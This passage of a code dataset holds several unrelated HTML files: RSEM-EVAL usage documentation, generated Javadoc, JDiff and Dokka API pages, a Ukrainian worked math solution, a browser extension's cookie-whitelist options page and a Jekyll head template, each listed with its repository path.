'sample_name.score.isoforms.results' and 'sample_name.score.genes.results' involves first estimating expected read coverage for each contig and then convert the expected read coverage into contig-level read generating probabilities. This procedure is aware of that provided sequences are contigs and gives better expression estimates for very short contigs. In addtion, the 'TPM' field is changed to 'CPM' field, which stands for contig per million.</p> <p>For 'sample_name.score.isoforms.results', one additional column is added. The additional column is named as 'contig_impact_score' and gives the contig impact score for each contig as described in section 5 of Additional file 1.</p> <h2><a name="example"></a> Example</h2> <p>We have a toy example in the 'examples' folder of the detonate distribution. A single true transcript is stored at file 'toy_ref.fa'. The single-end, 76bp reads generated from this transcript are stored in file 'toy_SE.fq'. In addition, we have three different assemblies based on the data: 'toy_assembly_1.fa', 'toy_assembly_2.fa' and 'toy_assembly_3.fa'. We also know the true transcript is from mouse and thus use 'mouse.txt' under 'true_transcript_length_distribution' as our transcript length parameter file.</p> <p>We run (assuming that we are in the rsem-eval directory)</p> <pre><code>./rsem-eval-calculate-score -p 8 \ --transcript-length-parameters true_transcript_length_distribution/mouse.txt \ ../examples/toy_SE.fq \ ../examples/toy_assembly_1.fa \ toy_assembly_1 76 </code></pre> <p>to obtain the RSEM-EVAL score. </p> <p>The RSEM-EVAL score can be found in 'toy_assembly_1.score'. The contig impact scores can be found in 'toy_assembly_1.score.isoforms.results'.</p> <h2><a name="authors"></a> Authors</h2> <p>RSEM-EVAL is developed by Bo Li, with substaintial technical input from Colin Dewey and Nate Fillmore.</p> <h2><a name="acknowledgements"></a> Acknowledgements</h2> <p>Please refer to the acknowledgements section in 'README_RSEM.md'.</p> <h2><a name="license"></a> License</h2> <p>RSEM-EVAL is licensed under the <a href="http://www.gnu.org/licenses/gpl-3.0.html">GNU General Public License v3</a>.</p> </body> </html>
fmaguire/BayeHem
bayehem/rsem/detonate-1.11/html/rsem-eval.html
HTML
apache-2.0
8,616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_152-ea) on Sat Jul 29 21:49:13 PDT 2017 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Class com.fasterxml.jackson.datatype.jsr310.ser.YearMonthSerializer (Jackson datatype: JSR310 2.9.0 API)</title> <meta name="date" content="2017-07-29"> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class com.fasterxml.jackson.datatype.jsr310.ser.YearMonthSerializer (Jackson datatype: JSR310 2.9.0 API)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?com/fasterxml/jackson/datatype/jsr310/ser/class-use/YearMonthSerializer.html" target="_top">Frames</a></li> <li><a href="YearMonthSerializer.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class com.fasterxml.jackson.datatype.jsr310.ser.YearMonthSerializer" class="title">Uses of Class<br>com.fasterxml.jackson.datatype.jsr310.ser.YearMonthSerializer</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#com.fasterxml.jackson.datatype.jsr310.ser">com.fasterxml.jackson.datatype.jsr310.ser</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="com.fasterxml.jackson.datatype.jsr310.ser"> <!-- --> </a> <h3>Uses of <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a> in <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/package-summary.html">com.fasterxml.jackson.datatype.jsr310.ser</a></h3> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing fields, and an explanation"> <caption><span>Fields in <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/package-summary.html">com.fasterxml.jackson.datatype.jsr310.ser</a> declared as <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a></code></td> <td class="colLast"><span class="typeNameLabel">YearMonthSerializer.</span><code><span class="memberNameLink"><a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html#INSTANCE">INSTANCE</a></span></code>&nbsp;</td> </tr> </tbody> </table> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/package-summary.html">com.fasterxml.jackson.datatype.jsr310.ser</a> that return <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>protected <a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">YearMonthSerializer</a></code></td> <td class="colLast"><span class="typeNameLabel">YearMonthSerializer.</span><code><span class="memberNameLink"><a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html#withFormat-java.lang.Boolean-java.time.format.DateTimeFormatter-com.fasterxml.jackson.annotation.JsonFormat.Shape-">withFormat</a></span>(<a href="http://docs.oracle.com/javase/7/docs/api/java/lang/Boolean.html?is-external=true" title="class or interface in java.lang">Boolean</a>&nbsp;useTimestamp, java.time.format.DateTimeFormatter&nbsp;formatter, com.fasterxml.jackson.annotation.JsonFormat.Shape&nbsp;shape)</code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../../com/fasterxml/jackson/datatype/jsr310/ser/YearMonthSerializer.html" title="class in com.fasterxml.jackson.datatype.jsr310.ser">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?com/fasterxml/jackson/datatype/jsr310/ser/class-use/YearMonthSerializer.html" target="_top">Frames</a></li> <li><a href="YearMonthSerializer.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2017 <a href="http://fasterxml.com/">FasterXML</a>. All rights reserved.</small></p> </body> </html>
FasterXML/jackson-modules-java8
docs/javadoc/datetime/2.9/com/fasterxml/jackson/datatype/jsr310/ser/class-use/YearMonthSerializer.html
HTML
apache-2.0
8,998
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN""http://www.w3.org/TR/REC-html40/frameset.dtd"> <HTML> <HEAD> <meta name="generator" content="JDiff v1.0.9"> <!-- Generated by the JDiff Javadoc doclet --> <!-- (http://www.jdiff.org) --> <meta name="description" content="JDiff is a Javadoc doclet which generates an HTML report of all the packages, classes, constructors, methods, and fields which have been removed, added or changed in any way, including their documentation, when two APIs are compared."> <meta name="keywords" content="diff, jdiff, javadiff, java diff, java difference, API difference, difference between two APIs, API diff, Javadoc, doclet"> <TITLE> org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator </TITLE> <LINK REL="stylesheet" TYPE="text/css" HREF="../stylesheet-jdiff.css" TITLE="Style"> </HEAD> <BODY> <!-- Start of nav bar --> <TABLE summary="Navigation bar" BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <TABLE summary="Navigation bar" BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../api/org/apache/pig/backend/hadoop/executionengine/mapReduceLayer/PigSecondaryKeyComparator.html" target="_top"><FONT CLASS="NavBarFont1"><B><tt>pig 0.8.0-CDH3B4-SNAPSHOT</tt></B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="changes-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="pkg_org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="jdiff_statistics.html"><FONT CLASS="NavBarFont1"><B>Statistics</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="jdiff_help.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM><b>Generated by<br><a href="http://www.jdiff.org" class="staysblack" target="_top">JDiff</a></b></EM></TD> </TR> <TR> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigRecordReader.html"><B>PREV CLASS</B></A> &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSplit.html"><B>NEXT CLASS</B></A> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <A HREF="../changes.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL: &nbsp; <a href="#constructors">CONSTRUCTORS</a>&nbsp;|&nbsp; <a href="#methods">METHODS</a>&nbsp;|&nbsp; FIELDS </FONT></TD> </TR> </TABLE> <HR> <!-- End of nav bar --> <H2> Class org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.<A HREF="../../api/org/apache/pig/backend/hadoop/executionengine/mapReduceLayer/PigSecondaryKeyComparator.html" target="_top"><tt>PigSecondaryKeyComparator</tt></A> </H2> <a NAME="constructors"></a> <p> <a NAME="Changed"></a> <TABLE summary="Changed Constructors" BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD VALIGN="TOP" COLSPAN=3><FONT SIZE="+1"><B>Changed Constructors</B></FONT></TD> </TR> <TR BGCOLOR="#FFFFFF" CLASS="TableRowColor"> <TD VALIGN="TOP" WIDTH="25%"> <A NAME="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator.ctor_changed()"></A> <nobr><A HREF="../../api/org/apache/pig/backend/hadoop/executionengine/mapReduceLayer/PigSecondaryKeyComparator.html#PigSecondaryKeyComparator()" target="_top"><tt>PigSecondaryKeyComparator</tt></A>(<code>void</code>) </nobr> </TD> <TD VALIGN="TOP" WIDTH="30%"> Change of visibility from public to protected.<br> </TD> <TD>&nbsp;</TD> </TR> </TABLE> &nbsp; <a NAME="methods"></a> <p> <a NAME="Removed"></a> <TABLE summary="Removed Methods" BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD VALIGN="TOP" COLSPAN=2><FONT SIZE="+1"><B>Removed Methods</B></FONT></TD> </TR> <TR BGCOLOR="#FFFFFF" CLASS="TableRowColor"> <TD VALIGN="TOP" WIDTH="25%"> <A NAME="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator.compare_removed(java.lang.Object, java.lang.Object, int, int, boolean[], boolean)"></A> <nobr><code>int</code>&nbsp;<A HREF="http://hadoop.apache.org/pig/docs/r0.7.0/api/org/apache/pig/backend/hadoop/executionengine/mapReduceLayer/PigSecondaryKeyComparator.html#compare(java.lang.Object, java.lang.Object, int, int, boolean[], boolean)" target="_top"><tt>compare</tt></A>(<code>Object,</nobr> Object<nobr>,</nobr> int<nobr>,</nobr> int<nobr>,</nobr> boolean[]<nobr>,</nobr> boolean<nobr><nobr></code>)</nobr> </TD> <TD>&nbsp;</TD> </TR> </TABLE> &nbsp; <a NAME="fields"></a> <HR> <!-- Start of nav bar --> <TABLE summary="Navigation bar" BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <TABLE summary="Navigation bar" BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../api/org/apache/pig/backend/hadoop/executionengine/mapReduceLayer/PigSecondaryKeyComparator.html" target="_top"><FONT CLASS="NavBarFont1"><B><tt>pig 0.8.0-CDH3B4-SNAPSHOT</tt></B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="changes-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="pkg_org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="jdiff_statistics.html"><FONT CLASS="NavBarFont1"><B>Statistics</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="jdiff_help.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3></TD> </TR> <TR> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigRecordReader.html"><B>PREV CLASS</B></A> &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSplit.html"><B>NEXT CLASS</B></A> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <A HREF="../changes.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> <TD BGCOLOR="0xFFFFFF" CLASS="NavBarCell3"></TD> </TR> </TABLE> <HR> <!-- End of nav bar --> </BODY> </HTML>
simplegeo/hadoop-pig
docs/jdiff/changes/org.apache.pig.backend.hadoop.executionengine.mapReduceLayer.PigSecondaryKeyComparator.html
HTML
apache-2.0
7,373
<h3 class="page-header">Розв'язок</h3> <div class="task-solution-top"></div> <div class="task-solution-bg"> <p> В першу чергу, обчислимо ОДЗ: </p> <div class="formula-block"> \begin{equation*} \begin{aligned} \mbox{ОДЗ}:\;&x-3\geq 0;\\ &x\geq 3; \end{aligned} \end{equation*} </div> <p> Перший доданок є завжди додатним, бо це квадратний корінь. Другий доданок, також завжди додатний, бо це модуль. Очевидно, що сума двох додатних чисел рівна нулю лише тоді, коли ці числа рівні нулю. Тобто, ми маємо таку систему: </p> <div class="formula-block"> \begin{equation*} \begin{aligned} &\left\{ \begin{aligned} &x-3=0,\\ &x^2-9=0; \end{aligned} \right.\\ &\left\{ \begin{aligned} &x=3,\\ &x=\pm 3; \end{aligned} \right. \end{aligned} \end{equation*} </div> <p> Значення $x=-3$ не задовольняє ОДЗ, тому відповідь буде: </p> <div class="formula-block"> $$x=3.$$ </div> </div>
SMHFandA/Tex.TasksSolutions
site/uk/chapter_5/group_1/solutions/solution_5_1_8.html
HTML
apache-2.0
1,399
<!DOCTYPE html> <html> <head> <title>Startup Cookie Manager</title> </head> <body> <h3 title="example.com will preserve example.com, and *.example.com cookies.">Cookie whitelist (include subdomains)</h3> <p title="example.com will preserve example.com, and *.example.com cookies."> <textarea id="subdomain-whitelist" rows="4" cols="50"></textarea> </p> <h3 title="example.com will preserve example.com, .example.com, and www.example.com cookies.">Cookie whitelist (root domains only)</h3> <p title="example.com will preserve example.com, .example.com, and www.example.com cookies."> <textarea id="domain-only-whitelist" rows="4" cols="50"></textarea> </p> <h3 title="Additional tasks to perform whenever cookies and site data are cleared.">Additional settings</h3> <p> <input type="checkbox" id="cache_option"> <label for="cache_option">Clear cache.</label> </p> <p> <input type="checkbox" id="history_option"> <label for="history_option">Clear history.</label> </p> <p align="center" style="color:grey;"> Developed by <a href="https://aaronhorler.com">Aaron Horler</a> (aghorler) | <a href="https://github.com/aghorler/Startup-Cookie-Destroyer">GitHub source</a> </p> <script src="/js/options.js"></script> </body> </html>
aghorler/Startup-Cookie-Destroyer
html/options.html
HTML
apache-2.0
1,380
<html> <head> <meta name="viewport" content="width=device-width, initial-scale=1" charset="UTF-8"> <title>minus</title> <link href="../../../images/logo-icon.svg" rel="icon" type="image/svg"> <script>var pathToRoot = "../../../";</script> <script type="text/javascript" src="../../../scripts/sourceset_dependencies.js" async="async"></script> <link href="../../../styles/style.css" rel="Stylesheet"> <link href="../../../styles/logo-styles.css" rel="Stylesheet"> <link href="../../../styles/jetbrains-mono.css" rel="Stylesheet"> <link href="../../../styles/main.css" rel="Stylesheet"> <script type="text/javascript" src="../../../scripts/clipboard.js" async="async"></script> <script type="text/javascript" src="../../../scripts/navigation-loader.js" async="async"></script> <script type="text/javascript" src="../../../scripts/platform-content-handler.js" async="async"></script> <script type="text/javascript" src="../../../scripts/main.js" async="async"></script> </head> <body> <div id="container"> <div id="leftColumn"> <div id="logo"></div> <div id="paneSearch"></div> <div id="sideMenu"></div> </div> <div id="main"> <div id="leftToggler"><span class="icon-toggler"></span></div> <script type="text/javascript" src="../../../scripts/pages.js"></script> <script type="text/javascript" src="../../../scripts/main.js"></script> <div class="main-content" id="content" pageIds="org.hexworks.zircon.api.data/Rect/minus/#org.hexworks.zircon.api.data.Rect/PointingToDeclaration//-828656838"> <div class="navigation-wrapper" id="navigation-wrapper"> <div class="breadcrumbs"><a href="../../index.html">zircon.core</a>/<a href="../index.html">org.hexworks.zircon.api.data</a>/<a href="index.html">Rect</a>/<a href="minus.html">minus</a></div> <div class="pull-right d-flex"> <div class="filter-section" id="filter-section"><button class="platform-tag platform-selector common-like" data-active="" data-filter=":zircon.core:dokkaHtml/commonMain">common</button></div> <div id="searchBar"></div> </div> </div> <div class="cover "> <h1 class="cover"><span>minus</span></h1> </div> <div class="divergent-group" data-filterable-current=":zircon.core:dokkaHtml/commonMain" data-filterable-set=":zircon.core:dokkaHtml/commonMain"><div class="with-platform-tags"><span class="pull-right"></span></div> <div> <div class="platform-hinted " data-platform-hinted="data-platform-hinted"><div class="content sourceset-depenent-content" data-active="" data-togglable=":zircon.core:dokkaHtml/commonMain"><div class="symbol monospace">abstract operator fun <a href="minus.html">minus</a>(rect: <a href="index.html">Rect</a>): <a href="index.html">Rect</a><span class="top-right-position"><span class="copy-icon"></span><div class="copy-popup-wrapper popup-to-left"><span class="copy-popup-icon"></span><span>Content copied to clipboard</span></div></span></div></div></div> </div> </div> <h2 class="">Sources</h2> <div class="table" data-togglable="Sources"><a data-name="%5Borg.hexworks.zircon.api.data%2FRect%2Fminus%2F%23org.hexworks.zircon.api.data.Rect%2FPointingToDeclaration%2F%5D%2FSource%2F-828656838" anchor-label="https://github.com/Hexworks/zircon/tree/master/zircon.core/src/commonMain/kotlin/org/hexworks/zircon/api/data/Rect.kt#L50" id="%5Borg.hexworks.zircon.api.data%2FRect%2Fminus%2F%23org.hexworks.zircon.api.data.Rect%2FPointingToDeclaration%2F%5D%2FSource%2F-828656838" data-filterable-set=":zircon.core:dokkaHtml/commonMain"></a> <div class="table-row" data-filterable-current=":zircon.core:dokkaHtml/commonMain" data-filterable-set=":zircon.core:dokkaHtml/commonMain"> <div class="main-subrow keyValue "> <div class=""><span class="inline-flex"><a href="https://github.com/Hexworks/zircon/tree/master/zircon.core/src/commonMain/kotlin/org/hexworks/zircon/api/data/Rect.kt#L50">(source)</a><span class="anchor-wrapper"><span class="anchor-icon" pointing-to="%5Borg.hexworks.zircon.api.data%2FRect%2Fminus%2F%23org.hexworks.zircon.api.data.Rect%2FPointingToDeclaration%2F%5D%2FSource%2F-828656838"></span> <div class="copy-popup-wrapper "><span class="copy-popup-icon"></span><span>Link copied to clipboard</span></div> </span></span></div> <div></div> </div> </div> </div> </div> <div class="footer"><span class="go-to-top-icon"><a href="#content"></a></span><span>© 2020 Copyright</span><span class="pull-right"><span>Sponsored and developed by dokka</span><a href="https://github.com/Kotlin/dokka"><span class="padded-icon"></span></a></span></div> </div> </div> </body> </html>
Hexworks/zircon
docs/2020.2.0-RELEASE-KOTLIN/zircon.core/zircon.core/org.hexworks.zircon.api.data/-rect/minus.html
HTML
apache-2.0
4,930
<head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="{{ site.description }}"> <title>{% if page.title %}{{ page.title }} - {{ site.title }}{% else %}{{ site.title }}{% endif %}</title> <link rel="canonical" href="{{ page.url | replace:'index.html','' | prepend: site.baseurl | prepend: site.url }}"> <!-- Bootstrap Core CSS --> <link rel="stylesheet" href="{{ "/css/bootstrap.min.css" | prepend: site.baseurl }}"> <!-- Custom CSS --> <link rel="stylesheet" href="{{ "/css/clean-blog.css" | prepend: site.baseurl }}"> <link rel="stylesheet" href="{{ "/css/style.css" | prepend: site.baseurl }}"> <!-- Pygments Github CSS --> <link rel="stylesheet" href="{{ "/css/syntax.css" | prepend: site.baseurl }}"> <!-- Custom Fonts --> <link href="http://maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head>
lucasmarcelli/marcellisite
_includes/head.html
HTML
apache-2.0
1,737
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- **************************************************************** --> <!-- * PLEASE KEEP COMPLICATED EXPRESSIONS OUT OF THESE TEMPLATES, * --> <!-- * i.e. only iterate & print data where possible. Thanks, Jez. * --> <!-- **************************************************************** --> <html> <head> <!-- Generated by groovydoc --> <title>VersionStrategies (Gradle Wooga Release plugin API)</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="../../../../../groovy.ico" type="image/x-icon" rel="shortcut icon"> <link href="../../../../../groovy.ico" type="image/x-icon" rel="icon"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <body class="center"> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="VersionStrategies (Gradle Wooga Release plugin API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../../../../../index.html?wooga/gradle/release/version/semver/VersionStrategies" target="_top">Frames</a></li> <li><a href="VersionStrategies.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;<li><a href="#property_summary">Property</a></li>&nbsp;&nbsp;&nbsp;Constructor&nbsp;&nbsp;&nbsp;Method&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;<li><a href="#prop_detail">Property</a></li>&nbsp;&nbsp;&nbsp;Constructor&nbsp;&nbsp;&nbsp;Method&nbsp;&nbsp;&nbsp; </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">Package: <strong>wooga.gradle.release.version.semver</strong></div> <h2 title="[Groovy] Class VersionStrategies" class="title">[Groovy] Class VersionStrategies</h2> </div> <div 